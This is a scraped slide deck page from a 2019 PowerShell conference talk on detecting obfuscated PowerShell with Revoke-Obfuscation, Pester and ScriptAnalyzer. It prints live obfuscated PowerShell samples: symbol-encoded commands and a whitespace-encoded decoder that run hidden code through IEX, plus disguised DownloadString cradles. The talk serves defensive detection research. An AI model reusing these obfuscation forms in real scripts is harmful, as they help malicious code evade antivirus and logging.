$keyTakeaway[0] • PowerShell obfuscation is easily accessible to all • Used frequently ITW • MOSTLY de-obfuscated by PowerShell scriptblock logging • Data science-driven detection exists with Revoke-Obfuscation • Maximum obfuscation is used by some attackers more than others • Minimal obfuscation is far less frequent but quite effective • PSScriptAnalyzer enables the best of both worlds for detection: • AST for targeted token type calculations and inspection • Flexible logic for marking as suspicious, creating weak signals, etc. PowerShell Conference EU 2019
$keyTakeaway[1] # Thank You PowerShell Community!!! • TFW you combine PowerShell logging, Revoke-Obfuscation AND PesterSec: PowerShell Conference EU 2019 https://media0.giphy.com/media/6XTnkNHVZv6AU/giphy.gifhttps://thumbs.gfycat.com/CooperativeDeliciousCaracal-size_restricted.gif
• Daniel Bohannon • Twitter: @danielhbohannon • Blog: https://danielbohannon.com/ • Github:_https://github.com/danielbohannon/ about_Author PowerShell Conference EU 2019 http://workpulse.io/blog/wp-content/uploads/2015/09/themasterpeice.gif

More Related Content

What's hot (20)

PDF
Penetration Testing AWS
Sanjeev Kumar Jaiswal
 
PPTX
Spring JMS
Emprovise
 
ODP
Network Security
hj43us
 
PDF
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
PPTX
An Introduction to OAuth 2
Aaron Parecki
 
PPTX
XXE: How to become a Jedi
Yaroslav Babin
 
PPTX
Mécanismes de sécurité(ios & android)
Institut supérieur des études technologiques de Radès
 
PPTX
HTTP Request Header and HTTP Status Code
Abhishek L.R
 
PDF
Hping Kullanarak Ağ Keşif Çalışmaları
BGA Cyber Security
 
PDF
Developing RESTful Web APIs with Python, Flask and MongoDB
Nicola Iarocci
 
PPTX
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 3
BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
PDF
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
Frans Rosén
 
PDF
Actividad No. 1.14: Replicación de datos en MySQL 5.1
Francisco Medina
 
PDF
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
PDF
Fault Tolerance 소프트웨어 패턴
IMQA
 
PDF
Secure coding presentation Oct 3 2020
Moataz Kamel
 
PDF
[OPD 2019] Attacking JWT tokens
OWASP
 
PDF
Decoding Web Accessibility through Testing - Anuradha Kumari
Wey Wey Web
 
PDF
Getting Started with Spring Authorization Server
VMware Tanzu
 
PDF
하이퍼레저 패브릭 실습자료
TIMEGATE
 
Penetration Testing AWS
Sanjeev Kumar Jaiswal
 
Spring JMS
Emprovise
 
Network Security
hj43us
 
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
An Introduction to OAuth 2
Aaron Parecki
 
XXE: How to become a Jedi
Yaroslav Babin
 
Mécanismes de sécurité(ios & android)
Institut supérieur des études technologiques de Radès
 
HTTP Request Header and HTTP Status Code
Abhishek L.R
 
Hping Kullanarak Ağ Keşif Çalışmaları
BGA Cyber Security
 
Developing RESTful Web APIs with Python, Flask and MongoDB
Nicola Iarocci
 
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 3
BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
Frans Rosén
 
Actividad No. 1.14: Replicación de datos en MySQL 5.1
Francisco Medina
 
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
Fault Tolerance 소프트웨어 패턴
IMQA
 
Secure coding presentation Oct 3 2020
Moataz Kamel
 
[OPD 2019] Attacking JWT tokens
OWASP
 
Decoding Web Accessibility through Testing - Anuradha Kumari
Wey Wey Web
 
Getting Started with Spring Authorization Server
VMware Tanzu
 
하이퍼레저 패브릭 실습자료
TIMEGATE
 

Similar to PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell (20)

PDF
Happy Go Programming
Lin Yo-An
 
PDF
Quality Assurance for PHP projects - ZendCon 2012
Michelangelo van Dam
 
PDF
QA for PHP projects
Michelangelo van Dam
 
PDF
Eve - REST API for Humans™
Nicola Iarocci
 
PDF
Elasticsearch sur Azure : Make sense of your (BIG) data !
Microsoft
 
PDF
Avro, la puissance du binaire, la souplesse du JSON
Alexandre Victoor
 
PDF
Танки_в_Лунапарке: нагрузочное_тестирование_в_Яндексе
Yandex
 
PDF
Webmontag Berlin "coffee script"
Webmontag Berlin
 
KEY
Workshop quality assurance for php projects tek12
Michelangelo van Dam
 
PDF
Cloud Security @ Netflix
Jason Chan
 
PDF
Great Developers Steal
Ben Scofield
 
PDF
Pearson Plug and Play @ Over the Air
Dan Murphy
 
PDF
Parse: 5 tricks that won YC Hacks
Thomas Bouldin
 
KEY
jQuery: Tips, tricks and hints for better development and Performance
Jonas De Smet
 
PDF
Pdxpugday2010 pg90
Selena Deckelmann
 
PPT
Hack in the Box Keynote 2006
Mark Curphey
 
PDF
Elasticsearch in 15 Minutes
Karel Minarik
 
PPTX
Codementor Office Hours with Eric Chiang: Stdin, Stdout: pup, Go, and life at...
Arc & Codementor
 
PDF
[WLDN] Supercharging word press development in 2018
Adam Tomat
 
DOC
PHP code examples
programmingslides
 
Happy Go Programming
Lin Yo-An
 
Quality Assurance for PHP projects - ZendCon 2012
Michelangelo van Dam
 
QA for PHP projects
Michelangelo van Dam
 
Eve - REST API for Humans™
Nicola Iarocci
 
Elasticsearch sur Azure : Make sense of your (BIG) data !
Microsoft
 
Avro, la puissance du binaire, la souplesse du JSON
Alexandre Victoor
 
Танки_в_Лунапарке: нагрузочное_тестирование_в_Яндексе
Yandex
 
Webmontag Berlin "coffee script"
Webmontag Berlin
 
Workshop quality assurance for php projects tek12
Michelangelo van Dam
 
Cloud Security @ Netflix
Jason Chan
 
Great Developers Steal
Ben Scofield
 
Pearson Plug and Play @ Over the Air
Dan Murphy
 
Parse: 5 tricks that won YC Hacks
Thomas Bouldin
 
jQuery: Tips, tricks and hints for better development and Performance
Jonas De Smet
 
Pdxpugday2010 pg90
Selena Deckelmann
 
Hack in the Box Keynote 2006
Mark Curphey
 
Elasticsearch in 15 Minutes
Karel Minarik
 
Codementor Office Hours with Eric Chiang: Stdin, Stdout: pup, Go, and life at...
Arc & Codementor
 
[WLDN] Supercharging word press development in 2018
Adam Tomat
 
PHP code examples
programmingslides
 
Ad

Recently uploaded (20)

PPTX
"Autonomy of LLM Agents: Current State and Future Prospects", Oles` Petriv
Fwdays
 
PPTX
AUTOMATION AND ROBOTICS IN PHARMA INDUSTRY.pptx
sameeraaabegumm
 
PPTX
OpenID AuthZEN - Analyst Briefing July 2025
David Brossard
 
PDF
Building Real-Time Digital Twins with IBM Maximo & ArcGIS Indoors
Safe Software
 
PDF
Fl Studio 24.2.2 Build 4597 Crack for Windows Free Download 2025
faizk77g
 
PDF
HCIP-Data Center Facility Deployment V2.0 Training Material (Without Remarks ...
mcastillo49
 
PDF
"Beyond English: Navigating the Challenges of Building a Ukrainian-language R...
Fwdays
 
PDF
Complete JavaScript Notes: From Basics to Advanced Concepts.pdf
haydendavispro
 
PDF
The Builder’s Playbook - 2025 State of AI Report.pdf
jeroen339954
 
PDF
SWEBOK Guide and Software Services Engineering Education
Hironori Washizaki
 
PDF
Log-Based Anomaly Detection: Enhancing System Reliability with Machine Learning
Mohammed BEKKOUCHE
 
PPTX
Building Search Using OpenSearch: Limitations and Workarounds
Sease
 
PDF
NewMind AI - Journal 100 Insights After The 100th Issue
NewMind AI
 
PDF
CIFDAQ Weekly Market Wrap for 11th July 2025
CIFDAQ
 
PDF
Agentic AI lifecycle for Enterprise Hyper-Automation
Debmalya Biswas
 
PPTX
Q2 FY26 Tableau User Group Leader Quarterly Call
lward7
 
PDF
HubSpot Main Hub: A Unified Growth Platform
Jaswinder Singh
 
PPTX
Webinar: Introduction to LF Energy EVerest
DanBrown980551
 
PDF
Bitcoin for Millennials podcast with Bram, Power Laws of Bitcoin
Stephen Perrenod
 
PDF
New from BookNet Canada for 2025: BNC BiblioShare - Tech Forum 2025
BookNet Canada
 
"Autonomy of LLM Agents: Current State and Future Prospects", Oles` Petriv
Fwdays
 
AUTOMATION AND ROBOTICS IN PHARMA INDUSTRY.pptx
sameeraaabegumm
 
OpenID AuthZEN - Analyst Briefing July 2025
David Brossard
 
Building Real-Time Digital Twins with IBM Maximo & ArcGIS Indoors
Safe Software
 
Fl Studio 24.2.2 Build 4597 Crack for Windows Free Download 2025
faizk77g
 
HCIP-Data Center Facility Deployment V2.0 Training Material (Without Remarks ...
mcastillo49
 
"Beyond English: Navigating the Challenges of Building a Ukrainian-language R...
Fwdays
 
Complete JavaScript Notes: From Basics to Advanced Concepts.pdf
haydendavispro
 
The Builder’s Playbook - 2025 State of AI Report.pdf
jeroen339954
 
SWEBOK Guide and Software Services Engineering Education
Hironori Washizaki
 
Log-Based Anomaly Detection: Enhancing System Reliability with Machine Learning
Mohammed BEKKOUCHE
 
Building Search Using OpenSearch: Limitations and Workarounds
Sease
 
NewMind AI - Journal 100 Insights After The 100th Issue
NewMind AI
 
CIFDAQ Weekly Market Wrap for 11th July 2025
CIFDAQ
 
Agentic AI lifecycle for Enterprise Hyper-Automation
Debmalya Biswas
 
Q2 FY26 Tableau User Group Leader Quarterly Call
lward7
 
HubSpot Main Hub: A Unified Growth Platform
Jaswinder Singh
 
Webinar: Introduction to LF Energy EVerest
DanBrown980551
 
Bitcoin for Millennials podcast with Bram, Power Laws of Bitcoin
Stephen Perrenod
 
New from BookNet Canada for 2025: BNC BiblioShare - Tech Forum 2025
BookNet Canada
 
Ad

PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell

  • 1. Daniel Bohannon (@danielhbohannon) Principal Applied Security Researcher FireEye's Advanced Practices Team PesterSec: Using Pester & ScriptAnalyzer for Detecting Obfuscated PowerShell https://victrolacoffeeroasters.files.wordpress.com/2011/04/latte_art_pour.jpg COPYRIGHT © 2019, FIREEYE, INC. ALL RIGHTS RESERVED. 2019
  • 2. PesterSec: Using Pester & ScriptAnalyzer for Detecting Obfuscated PowerShell 2019 Daniel Bohannon (@danielhbohannon)
  • 3. 2019 Daniel Bohannon (@danielhbohannon) PS> (ls env:User*)[1].Value • Principal Applied Security Researcher • FireEye's Advanced Practices Team • Blog: http://danielbohannon.com • I like writing detection stuff • I REALLY like writing obfuscation stuff
  • 4. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 5. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 6. [System.Motivation]::GetBackground() • Background of 9 years in: • IT operations • Operational security • Incident Response consulting • Applied detection R&D at scale • 2 consistent things in each role PowerShell Conference EU 2019
  • 7. [System.Motivation]::GetBackground() • Background of 9 years in: • IT operations • Operational security • Incident Response consulting • Applied detection R&D at scale • 2 consistent things in each role • Coffee connoisseur PowerShell Conference EU 2019 https://www.beanthere.co.za/shop/home-brewing/chemex-coffee-maker/
  • 8. [System.Motivation]::GetBackground() • Background of 9 years in: • IT operations • Operational security • Incident Response consulting • Applied detection R&D at scale • 2 consistent things in each role • Coffee connoisseur • Aspiring PowerShell aficionado https://i2.wp.com/powershelldistrict.com/wp-content/uploads/2015/01/PowerShell-Hero.png https://www.beanthere.co.za/shop/home-brewing/chemex-coffee-maker/ PowerShell Conference EU 2019
  • 9. [System.Motivation]::GetBackground() • @(1..9) | % { "$_ years Working" } • @(1..7) | % { "$_ years PowerShelling" } • @(1..6) | % { "$_ years Detecting" } https://i2.wp.com/powershelldistrict.com/wp-content/uploads/2015/01/PowerShell-Hero.png PowerShell Conference EU 2019
  • 10. [System.Motivation]::GetBackground() • @(1..9) | % { "$_ years Working" } • @(1..7) | % { "$_ years PowerShelling" } • @(1..6) | % { "$_ years Detecting" } PowerShell Conference EU 2019 http://haxf4rall.com/2017/12/18/invoke-psimage-tool-to-embed-powershell-scripts-in-png-image-pixels/ Attackers PowerShell
  • 11. [System.Motivation]::GetBackground() • @(1..9) | % { "$_ years Working" } • @(1..7) | % { "$_ years PowerShelling" } • @(1..6) | % { "$_ years Detecting" } • @(1..3) | % { "$_ years Obfuscating" } while ($attacker.techniques -contains 'evasion') { $research = New-Research -Type Detection New-Detection -Content $research –Type @('host','network') } https://i2.wp.com/powershelldistrict.com/wp-content/uploads/2015/01/PowerShell-Hero.png PowerShell Conference EU 2019
  • 12. • FireEye Advanced Practices Team • Tracking attacker activity • Researching new attacker methods • Developing detections for these methods about_FindingEvil https://cdn-images-1.medium.com/max/1600/1*pazSTVPiSkUB7w7WiDpZNA.jpeg PowerShell Conference EU 2019
  • 13. Get-Evil | Sort-Object ObfuscationLevel | ogv • Slice & dice some malicious PowerShell • Highlight varying obfuscation levels & styles • Discuss trends in PowerShell obfuscation & detection efforts • Signatures vs signatureless vs targeted feature-based signatures • Novel detection approaches https://www.brafton.com/wp-content/uploads/2019/01/searching.gif PowerShell Conference EU 2019
  • 14. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 15. Get-Help Invoke-((Ob|DOS)fuscation|CradleCrafter) -Example PowerShell Conference EU 2019 https://media.giphy.com/media/dTGeSnz0FzufK/giphy.gif
  • 17. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 18. Start-Process -Verb Detect -ArgumentList @('piece','by','piece') • Static detection R&D often starts with identifying numerous building blocks • Focus on multi-level detection of building blocks • Treat as either high fidelity or combination of #WeakSignals https://www.tibco.com/blog/wp-content/uploads/2015/05/lego.jpg PowerShell Conference EU 2019
  • 19. Start-Process -Verb Detect -ArgumentList @('piece','by','piece') • Static detection R&D often starts with identifying numerous building blocks • Focus on multi-level detection of building blocks • Treat as either high fidelity or combination of #WeakSignals https://www.tibco.com/blog/wp-content/uploads/2015/05/lego.jpg PowerShell Conference EU 2019
  • 20. Start-Process -Verb Detect -ArgumentList @('piece','by','piece') https://media2.giphy.com/media/vRDMuINIfLTc4/giphy.gif PowerShell Conference EU 2019 • Why this signature-based static detection when PowerShell logging is available? • Defense in depth (if PS logging disabled) • Detecting guardrailed and/or keyed PowerShell • Open Source repo detection using YARA rules • Network detection of PS transfers
  • 21. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 22. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 23. Out-Obfuscated -Level @(999..100000) PowerShell Conference EU 2019 ${-'*}=+$( ); ${ }= ${-'*} ; ${(+} =++ ${-'*};${)}=(${-'*}=${-'*}+${(+} ) ; ${'/}= (${-'*} =${-'*}+ ${(+} ); ${@} = ( ${-'*}=${-'*} + ${(+}) ; ${~ =} =( ${-'*}= ${-'*}+ ${(+}); ${;} =(${-'*} =${-'*}+${(+}) ; ${+} = (${-'*}= ${-'*} + ${(+}) ; ${]} = ( ${-'*} =${-'*} + ${(+});${-}= (${-'*}=${-'*} + ${(+} ) ; ${-$.}="["+ "$( @{ }) "[${+}] +"$(@{})"["${(+}" +"${- }"]+ "$(@{} )"["${)}"+ "${ }" ] + "$? "[${(+} ] +"]";${-'*}="".("$(@{} )"[ "${(+}" + "${@}"]+"$(@{} ) "[ "${(+}" + "${;}" ]+ "$(@{} )"[ ${ }]+"$(@{ })"[ ${@}] +"$? "[${(+}]+"$(@{} ) "[${'/}]) ; ${-'*} ="$(@{ } )"[ "${(+}" + "${@}"] +"$(@{ })"[${@}]+ "${- '*}"["${)}"+"${+}"] ; "${-'*}(${-$.}${+}${'/} + ${-$.}${;}${-} +${-$.}${]}${]} + ${-$.}${'/}${)} + ${-$.}${@}${ }+ ${-$.}${+}${]}+${-$.}${(+}${ }${(+} +${-$.}${(+}${(+}${-}+ ${-$.}${@}${~ =} + ${- $.}${+}${-} + ${-$.}${-}${]}+${-$.}${(+}${ }${;} + ${-$.}${(+}${ }${(+}+${-$.}${-}${-}+${- $.}${(+}${(+}${;}+ ${-$.}${'/}${)}+ ${-$.}${+}${]}+${-$.}${(+}${ }${(+}+ ${-$.}${(+}${(+}${;}+${- $.}${@}${;} +${-$.}${]}${+} + ${-$.}${(+}${ }${(+} +${-$.}${-}${]}+${-$.}${;}${+} + ${-$.}${(+}${ }${]} +${-$.}${(+}${ }${~ =} +${-$.}${(+}${ }${(+}+ ${-$.}${(+}${(+}${ }+ ${-$.}${(+}${(+}${;} + ${-$.}${@}${(+} + ${-$.}${@}${;}+${-$.}${;}${]}+ ${-$.}${(+}${(+}${(+} +${-$.}${(+}${(+}${-} + ${- $.}${(+}${(+}${ }+ ${-$.}${(+}${ }${]} + ${-$.}${(+}${(+}${(+} + ${-$.}${-}${+}+${-$.}${(+}${ }${ } +${-$.}${]}${'/}+${-$.}${(+}${(+}${;}+ ${-$.}${(+}${(+}${@}+ ${-$.}${(+}${ }${~ =} + ${- $.}${(+}${(+}${ } + ${-$.}${(+}${ }${'/}+ ${-$.}${@}${ }+ ${-$.}${'/}${-}+${-$.}${(+}${ }${@}+${- $.}${(+}${(+}${;} +${-$.}${(+}${(+}${;} + ${-$.}${(+}${(+}${)}+${-$.}${~ =}${]}+${-$.}${@}${+}+${- $.}${@}${+} + ${-$.}${-}${]}+${-$.}${(+}${ }${~ =} + ${-$.}${(+}${(+}${;} +${-$.}${@}${;}+ ${- $.}${(+}${ }${]} +${-$.}${(+}${)}${(+}+ ${-$.}${@}${+} +${-$.}${+}${;}+ ${-$.}${~ =}${(+} +${- $.}${(+}${ }${'/}+ ${-$.}${@}${-} +${-$.}${(+}${(+}${;}+${-$.}${'/}${-} + ${-$.}${@}${(+})"|. ${-'*}
  • 24. Out-Obfuscated -Level @(999..100000) PowerShell Conference EU 2019 ${ }= + $( ); ${ }= ${ } ; ${ } =++${ } ;${ }= (${ }= ${ }+${ });${ }=(${ } = ${ }+${ } ) ;${ }=( ${ }= ${ } +${ } ) ;${ } =( ${ } = ${ } +${ } );${ } = ( ${ }= ${ } +${ } ) ;${ }=( ${ }= ${ } + ${ }) ; ${ } =(${ }= ${ } +${ }); ${ } =(${ } = ${ } +${ }); ${ } = "[" +"$(@{ })"[ ${ }] + "$(@{})"[ "${ }${ }"]+ "$(@{ } )"[ "${ }${ }"] + "$? "[${ }]+"]" ; ${ } ="".("$( @{ }) "[ "${ }${ }"]+"$(@{ } )"["${ }${ }" ]+"$( @{}) "[ ${ } ]+"$(@{} ) "[ ${ } ]+ "$?"[ ${ } ] +"$(@{ }) "[ ${ }]);${ } = "$( @{} ) "[ "${ }" + "${ }" ] +"$( @{ }) "[ ${ } ]+"${ }"[ "${ }" + "${ }" ]; & ${ } ( " ${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }+${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }| ${ }")
  • 25. Out-Obfuscated -Level @(999..100000) PowerShell Conference EU 2019 ' ' | % {$Script = $_ -Split '' | % {''; $_.Split('') | % {$_.Length-1}} ; $DecodedCommand = [Char[]] [Int[]]($Script[0..($Script.Length-1)] -Join '').Trim('').Split('') -Join ''; IE`X $DecodedCommand} 1000’s of whitespace & tab characters
  • 28. about_RevokeObfuscation PowerShell Conference EU 2019 -not ($healthy -or $normal)
  • 29. about_RevokeObfuscation PowerShell Conference EU 2019 Avg Char Freq of ALL 3.4K PoshCode scripts
  • 31. about_RevokeObfuscation PowerShell Conference EU 2019 SAMPLE 2: Symbolic (0.157) SAMPLE 1: Invoke-Obfuscation (0.379)
  • 33. about_RevokeObfuscation PowerShell Conference EU 2019 Similarity https://cobbr.io/ObfuscationDetection.html
  • 34. about_RevokeObfuscation PowerShell Conference EU 2019 https://cobbr.io/ObfuscationDetection.html https://en.wikipedia.org/wiki/Precision_and_recall Similarity Measure Score Accuracy 0.71 Precision 0.89 Recall 0.37 F1 Score 0.52 True Positives 0.16 False Positives 0.02 True Negatives 0.55 False Negatives 0.27 https://cobbr.io/ObfuscationDetection.html
  • 35. PowerShell Conference EU 2019 https://media.giphy.com/media/WWRArOTz2L3wI/200w_d.gif
  • 36. Get-Command -Name ("{1}{0}" -f "-Process","Get") about_AbstractSyntaxTree PowerShell Conference EU 2019 StringExpandable RParenComma StringExpandable Format StringExpandable LParen Parameter Generic
  • 37. Get-Command -Name ("{1}{0}" -f "-Process","Get") about_AbstractSyntaxTree PowerShell Conference EU 2019 StringExpandable RParenComma StringExpandable Format StringExpandable LParen Parameter Generic ScriptBlockAst NamedBlockAst: Begin NamedBlockAst: End StatementAst PipelineAst CommandAst StringConstantExpressionAst CommandParameterAst ParenExpressionAst PipelineAst BinaryExpressionAst Operator: FormatLeft: StringConstantAst Right: ArrayLiteralAst 0: StringConstantExpressionAst 1: StringConstantExpressionAst
  • 38. about_LogisticRegression #MathStuff PowerShell Conference EU 2019 + = Linear Regression Logit Function Logistic Regression https://en.wikipedia.org/wiki/Logistic_regression
  • 39. about_StochasticGradientDescent #MoarMathStuff PowerShell Conference EU 2019 • Result = Bias + (F1 * Weight1) + (F2 * Weight2) + (…) • ExpectedResult = (from labeled data) • Error = Result – ExpectedResult • Adjust each weight according to how much they contributed to the error. Do this a lot. https://en.wikipedia.org/wiki/Stochastic_gradient_descent
  • 40. about_LeeAndDanielHappyDance PowerShell Conference EU 2019 https://en.wikipedia.org/wiki/Precision_and_recall Measure Cosine Similarity Logistic Regression with Gradient Descent Accuracy 0.71 0.96 Precision 0.89 0.96 Recall 0.37 0.94 F1 Score 0.52 0.95 True Positives 0.16 0.36 False Positives 0.02 0.01 True Negatives 0.55 0.60 False Negatives 0.27 0.02 10x better at finding obfuscated content Half the false positives
  • 41. Get-Help Revoke-Obfuscation -Role PowerShell Conference EU 2019 • Revoke-Obfuscation highlights: • First AST-based PowerShell obfuscation detection framework • Signatureless data science approach • Daniel’s first “real” PowerShell module (& published to PowerShell Gallery) https://steamuserimages-a.akamaihd.net/ugc/26225809579209707/BD9801C802D330C551B79820D23BD8074DA9B75D/
  • 42. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 43. Out-Obfuscated -Level Minimal • Level & depth of obfuscation in malicious PowerShell varies wildly • No obfuscation – BLAND • Minimal obfuscation – ??? • Maximum obfuscation – ??? http://www.pngpix.com/wp-content/uploads/2016/06/PNGPIX-COM-Sliced-Wheat-Bread-PNG-Image.png PowerShell Conference EU 2019
  • 44. Out-Obfuscated -Level Minimal • Level & depth of obfuscation in malicious PowerShell varies wildly • No obfuscation – BLAND • Minimal obfuscation – ??? • Maximum obfuscation – SALTY http://www.pngpix.com/wp-content/uploads/2016/06/PNGPIX-COM-Sliced-Wheat-Bread-PNG-Image.png PowerShell Conference EU 2019 https://thumbs.gfycat.com/AnchoredAchingBighorn-size_restricted.gif
  • 45. Out-Obfuscated -Level Minimal • Level & depth of obfuscation in malicious PowerShell varies wildly • No obfuscation – BLAND • Minimal obfuscation – ??? • Maximum obfuscation – SALTY • ^^^ layered – EXTRA-SALTY https://steamuserimages-a.akamaihd.net/ugc/993492320936652061/35067ABF992F42EF4A7447CD39CA37A856EF08C0/ PowerShell Conference EU 2019 https://thumbs.gfycat.com/AnchoredAchingBighorn-size_restricted.gif
  • 46. Out-Obfuscated -Level Minimal • Level & depth of obfuscation in malicious PowerShell varies wildly • No obfuscation – BLAND • Minimal obfuscation – TASTEFUL • Maximum obfuscation – SALTY • ^^^ layered – EXTRA-SALTY https://media.giphy.com/media/l4Jz3a8jO92crUlWM/giphy.gif PowerShell Conference EU 2019 https://thumbs.gfycat.com/AnchoredAchingBighorn-size_restricted.gif
  • 47. Out-Obfuscated -Level Minimal • Level & depth of obfuscation in malicious PowerShell varies wildly • No obfuscation – BLAND • Minimal obfuscation – TASTEFUL • Maximum obfuscation – SALTY https://media.giphy.com/media/l4Jz3a8jO92crUlWM/giphy.gif PowerShell Conference EU 2019 https://thumbs.gfycat.com/AnchoredAchingBighorn-size_restricted.gif Ryan Cobb (@cobbr_io)
  • 48. Get-Help PSAmsi -Functionality • Using the AST (Abstract Syntax Tree) for minimal obfuscation • PSAmsi (@cobbr_io) • Uses AST to minimally obfuscate PowerShell scripts to evade specific A/V signatures • https://github.com/cobbr/PSAmsi PowerShell Conference EU 2019 https://specterops.io/who-we-are/the-team
  • 49. Out-Obfuscated -Level Minimal -Type @('Quantity','Depth') • Two types of minimal obfuscation (can be combined): • Quantity – Obfuscate only 3 of the 27 script blocks • Depth – Light obfuscation of any given token PowerShell Conference EU 2019 Deep Obfuscation Shallow Obfuscation ."Do`wn`load`Str`in`g" ."Download`String" .("{1}{0}{2}" -f "load","Down","String") .("Download"+"String")
